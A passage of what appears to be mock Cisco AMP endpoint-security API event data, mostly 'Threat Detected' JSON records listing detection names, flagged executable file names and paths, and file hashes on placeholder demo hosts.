Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258221137723467","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258169598116000,"timestamp":1610705645,"timestamp_nanoseconds":648000000,"date":"2021-01-15T10:14:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258169598115914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257843180601000,"timestamp":1610705569,"timestamp_nanoseconds":536000000,"date":"2021-01-15T10:12:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257843180601413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":834324,"timestamp":1610705568,"timestamp_nanoseconds":82375000,"date":"2021-01-15T10:12:48+00:00","event_type":"Uninstall","event_type_id":553648166,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257791640994000,"timestamp":1610705557,"timestamp_nanoseconds":898000000,"date":"2021-01-15T10:12:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257791640993860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257740101386000,"timestamp":1610705545,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:12:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257740101386307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257688561779000,"timestamp":1610705533,"timestamp_nanoseconds":874000000,"date":"2021-01-15T10:12:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257688561778754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257641317138000,"timestamp":1610705522,"timestamp_nanoseconds":236000000,"date":"2021-01-15T10:12:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257641317138497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":641000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667317698527247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} 